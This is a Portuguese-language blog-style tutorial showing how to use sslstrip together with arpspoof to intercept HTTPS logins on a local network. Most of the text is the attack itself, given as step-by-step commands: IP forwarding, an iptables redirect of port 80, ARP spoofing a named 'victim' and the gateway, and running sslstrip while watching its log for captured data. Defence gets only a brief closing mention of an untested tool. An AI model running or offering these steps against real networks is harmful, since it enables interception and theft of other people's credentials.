O danado Moxie Marlinspike, em um dia de muita luz em sua cabeça, criou um script para interceptar dados seguros transportados em sites web. Toda a interceptação funciona basicamente assim: o sslstrip realiza um "Man in the Middle", substituindo as requisições "https" do cliente por "http". Quando o cliente entra com os dados, o script loga usando https e o cliente nem se dá conta do que está ocorrendo.
Penetrando adentro
A primeira coisa a se fazer é ativar o ip_forward de sua máquina para que os pacotes sejam roteados.
# echo "1" > /proc/sys/net/ipv4/ip_forward
Agora vamos as ferramentas necessárias:
- python >=2.5 (apt-get install python)
- python-twisted-web (apt-get install python-twisted-web)
- arpspoof (apt-get install dsniff)
- sslstrip (wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz)
Extraia o sslstrip em um local de sua preferência:
# tar -xzvf sslstrip-0.8.tar.gz -C /opt/
Agora precisamos redirecionar o fluxo da porta 80 para outra porta onde o sslstrip irá escuta-lo:
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
A porta de escuta pode ser qualquer uma que não esteja sendo usada.
Agora vamos a cereja do bolo:
# arpspoof -i eth0 -t Vitima Gateway
-i eth0: interface de rede que está a vítima e o gateway
-t Vitima
Gateway: endereço ip do servidor de internet local (roteador, gateway e afins)
Neste momento, executamos o script em python:
# python /opt/sslstrip.py -w /tmp/sslstrip.log -l 10000
Agora é só aguardar que a vítima solicite uma conexão https. Para verificar em tempo real, use o comando tail no log:
$ tail -f /tmp/sslstrip.log
No youtube tem vários videos que demonstram o ataque. Selecionei um para facilitar: http://youtu.be/TJHcfs4inhs
O mais importante: como se proteger deste tipo de ataque?
Existe uma ferramenta (que eu não testei ainda) que promete diversos tipos de proteção. Segue o link abaixo:
http://sourceforge.net/projects/arpon/
Espero que tenha enriquecido a galera com mais conhecimento!
Abraços
Fontes:
segurancalinux.com
Thoughtcrime
ArpON
